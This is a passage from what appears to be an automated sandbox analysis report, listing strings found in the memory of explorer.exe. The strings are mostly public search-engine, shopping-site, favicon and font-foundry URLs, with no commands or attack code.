          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000009.00000000.313630372.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000009.00000000.313630372.000000000A9D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000009.00000000.316129007.000000000B1D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.316255287.000000000B436000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000009.00000000.314721144.000000000AAC3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
